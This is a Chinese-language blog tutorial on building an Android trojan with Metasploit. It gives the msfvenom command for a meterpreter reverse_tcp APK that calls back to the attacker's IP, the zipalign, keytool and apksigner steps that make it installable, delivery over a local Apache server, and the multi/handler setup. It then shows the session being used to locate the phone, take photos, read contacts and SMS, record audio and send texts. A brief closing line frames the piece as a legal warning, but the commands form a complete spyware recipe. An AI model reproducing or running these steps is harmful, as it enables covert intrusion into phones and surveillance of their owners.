MSF手机渗透实验

一、准备阶段

  本实验是在kail里面使用msf工具生成一个Android木马程序,然后客户端进行下载,从而渗透。

实验范围为局域网的手机,即入侵的手机要与电脑处于同一个网段,这就需要将虚拟机设置为桥接模式,并手动配置ip。

1.查看虚拟机ip

f994a04cfa1a408d865986148dfc0b01.png

此时手机的ip段为192.168.43.0段故需要更改虚拟机ip

vim /etc/network/interfaces

更改静态ip、网关等 e820f6761f644b0298b4f2fe2cc963fd.png

重启虚拟机网络配置

systemctl restart networking

查看ip地址 90313f976afc400b87c87732e3ee6746.png

 连通性测试

fe54e37ee5e6436fafb61a29c1ce24c9.png

 二、生成Android木马程序

1.获取apk

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.38 lport=5555 R>zzh.apk

其中lhost后面是虚拟机端的ip地址,lport也是虚拟机的端口号(256以上可以随便设置,尽量大点)。后面跟的zzh.apk为生成的Android程序名称。

35e457954abc411db3221cc0a3cee965.png

2.对应用进行对齐优化

a.先下载zipalign工具

8d928cc052ad4142864d53227edc3460.png

b.使用工具输入命令进行对齐优化

zipalign -v 4 zzh.apk GRIT.apk

zipalign -v 4 原Apk 优化完Apk地址

输出结果为如下图:

 4f31921616e940b8ad29b3709f9f1050.png

此时该路径下应该有两个apk文件一个是最初始的zzh.apk,一个是对齐后的GRIT.apk

ef1ba62b041548909ee0d8c1379474a8.png

 3.生成密钥对

keytool -genkey -v -keystore zzh.keystore -alias zzh -keyalg RSA -keysize 2084 -validity 365

 a.解析

-alias 产生别名(zzh)
-keystore 指定密钥库的名称(就像数据库一样的证书库,可以有很多个证书,cacerts这个文件是jre自带的,你也可以使用其它文件名字,如果没有这个文件名字,它会创建这样一个这里为zzh.keystore)
-v 显示密钥库中的证书详细信息
-validity 指定创建的证书有效期多少天(365)
-keysize 指定密钥长度(2084)

-keyalg RSA(算法)

b. 输出结果

47e7370e407440a792b1e1f150642e87.png

4.对apk签名

a.下载apksigner工具

94b3d3cadebf482ea003842d843ec724.png

b.使用工具签名

apksigner sign --ks zzh.keystore --ks-key-alias zzh GRIT.apk 

c.解析

apksigner sign --ks (签名地址zzh.keystore) --ks-key-alias (别名zzh) (待签名的apk地址)

d.结果

ed50b00c8a0c4f42a6894a5c1bbbc754.png

此处需要输入密码为生成密钥对时设置的密码 。

三、下载GRIT.apk

将上面的设置完成后就可以将GRIT.apk下载到手机上进行实验了

1.直接通过发送方法发送到手机上

2.手机访问ip下载

a.在此处插入一行

f00b982c6e6a405da47d020cd8c0e5ec.png

 b.开启相关服务

service apache2 start

c.手机访问ip下载

5e18136aa50d40c0954ee15fee584d6f.png5e183f1c9b08441baea1891c13ee47dd.jpege556a4114d8a4c02b0d0cd750550f5b9.pngf29f1978ba2e4629ad0defd540c51e24.png

 最后的结果弹出版本旧,哈哈,到这步手机部分已经结束了....

 四、启动msfconsole

1.加载模块

use exploit/multi/handler

2.设置payload监听

set payload android/meterpreter/reverse_tcp

3.设置options

set lhost 192.168.43.38
set lport 5555

ead0edfacaea465c9f056101c7304593.png

五、启动

1.run

c14c5d489d6b428d98540e640923e6c3.png

2.点击手机软件

c9077f9f71e34b8296ba2fc6b5182bf0.png

六、检验

1.定位

59f99ad176db4fabb288c9e86ba91035.png

2.拍照

95de0046aa7b4521b09e8f8cd3cccb2f.png

b4990130b3114f14b5a177bbec36a994.jpeg

3.手机电话号码

3c8a6b014ac9428c8c27a4f3e62abaa5.png

4.短信

80c86d2707314c95854cd3db363e79ab.png

5.录音

record_mic录音加上-d参数指定录音时长(秒)

6.发送信息

send_sms -d 号码 -t "信息"

 六、结语

  根据国家安全法,非法入侵一定是犯法的,此次实验主要是告诉我们以后看到无视风险安装和退出安装,记得一定把控住点退出安装啊。

  • 7
    点赞
  • 74
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

『Knight』

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值